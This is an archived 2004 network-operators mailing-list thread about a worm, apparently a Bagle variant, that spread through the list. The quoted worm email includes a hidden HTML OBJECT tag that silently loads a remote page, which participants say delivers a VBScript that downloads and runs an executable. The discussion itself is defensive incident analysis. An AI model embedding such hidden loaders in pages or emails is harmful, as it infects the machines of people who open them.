Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). "Connection refused" when I tried to see what's there. ---------- Forwarded message ---------- Return-Path: <owner-nanog@merit.edu> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ... Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST) Delivered-To: nanog@merit.edu Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for <nanog@merit.edu>; Wed, 17 Mar 2004 23:04:46 -0500 (EST) Date: Thu, 18 Mar 2004 15:04:22 +1000 To: nanog@merit.edu Subject: Re: Hi From: srh@merit.edu Message-ID: <nxkitnadhcvpztronff@merit.edu> ... <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://165.134.187.102:81/132847.php"> </OBJECT></body></html>
In message <Pine.LNX.4.44.0403172118250.2114-100000@sokol.elan.net>, "william(a t)elan.net" writes:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). "Connection refused" when I tried to see what's there.
No -- I'm pretty sure it's a worm. Of the 20 copies I've received -- in just the last 3 hours -- only three have been via the NANOG list. On the bright side, Spamassassin 2.63's default settings seem to kill this one. In fact, it was only by accident that I even noticed them. --Steve Bellovin, http://www.research.att.com/~smb
william(at)elan.net writes on 3/18/2004 11:03 AM:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
Have you, by any chance, heard of "bcc"? That isn't a bug, that's a feature. -- srs (postmaster|suresh)@outblaze.com // gpg : EDEDEFB9 manager, outblaze.com security and antispam operations
On 18.03.2004 05:47 Suresh Ramasubramanian wrote:
william(at)elan.net writes on 3/18/2004 11:03 AM:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
Have you, by any chance, heard of "bcc"? That isn't a bug, that's a feature.
Have you, by any chance, heard that most list mailers may be configured to refuse mails where the list-address does appear as Bcc ... Arnold
Interesting, it does respond, albiet sporadically.. It contains the usual stuff... a trojan.. It looks like a variant of Psyme.. *sigh* -colin. On 18/03/2004, at 4:33 PM, william(at)elan.net wrote:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). "Connection refused" when I tried to see what's there.
FYI - if you're on windows machine DON'T TRY TO FOLLOW URL in that post Somebody sent me a copy of the content and its vbscript that downloads an image converts it into executable and then probably uses some bug in microshit products to have it executed. I'm not that good with windows scripting so whoever of the security people here wants to see it futher if you can not get it yourself, let me know. Its possible this maybe zombie making virus using nanog to replicate (somebody's sick joke) but possibly its more general with other lists too. Spammers and virus writers joined together are getting nastier and nastier. On Wed, 17 Mar 2004, william(at)elan.net wrote:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). "Connection refused" when I tried to see what's there.
---------- Forwarded message ---------- Return-Path: <owner-nanog@merit.edu> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ... Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST) Delivered-To: nanog@merit.edu Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for <nanog@merit.edu>; Wed, 17 Mar 2004 23:04:46 -0500 (EST) Date: Thu, 18 Mar 2004 15:04:22 +1000 To: nanog@merit.edu Subject: Re: Hi From: srh@merit.edu Message-ID: <nxkitnadhcvpztronff@merit.edu> ...
william(at)elan.net wrote:
FYI - if you're on windows machine DON'T TRY TO FOLLOW URL in that post
Somebody sent me a copy of the content and its vbscript that downloads an image converts it into executable and then probably uses some bug in microshit products to have it executed. I'm not that good with windows scripting so whoever of the security people here wants to see it futher if you can not get it yourself, let me know. Its possible this maybe zombie making virus using nanog to replicate (somebody's sick joke) but possibly its more general with other lists too. Spammers and virus writers joined together are getting nastier and nastier.
It's another varient of Bagle... My analysis of it is at: http://www.au.sorbs.net/virus.explain.txt - since then Symantec has release it's more detailed explaination under the headings for Bagle.r and Bagle.s / Mat
participants (6)
-
Arnold Nipper -
Colin Neeson -
Matthew Sullivan -
Steven M. Bellovin -
Suresh Ramasubramanian -
william(at)elan.net